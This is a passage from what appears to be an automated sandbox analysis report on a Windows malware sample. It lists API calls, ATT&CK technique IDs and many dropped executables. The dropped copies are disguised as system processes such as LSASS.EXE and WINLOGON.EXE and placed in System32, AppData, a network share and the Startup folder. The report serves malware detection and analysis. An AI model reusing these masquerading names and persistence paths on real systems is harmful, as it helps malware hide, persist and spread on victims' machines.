00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter D3_08.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00000940)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"D3_08.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"352\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"392\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"400\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"456\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"492\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"508\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"516\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"612\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"688\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"772\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"832\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"876\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"904\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1256\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1280\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1336\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1496\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1548\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1560\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"\\Device\\KsecDD\"\n \"D3_08.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46834 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46883 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46826 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46920 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46821 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46872 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46839 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46692 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46976 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46865 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46838 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46938 bytes starting with PE header signature to file \"C:\\D3_08\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46685 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 47048 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46754 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46802 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 46947 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46895 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46925 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46934 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46749 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46845 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46807 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46876 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46820 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46777 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46826 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46791 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46981 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46842 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46947 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46740 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46778 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46743 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46765 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46781 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46856 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46880 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46759 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46883 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46756 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46950 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 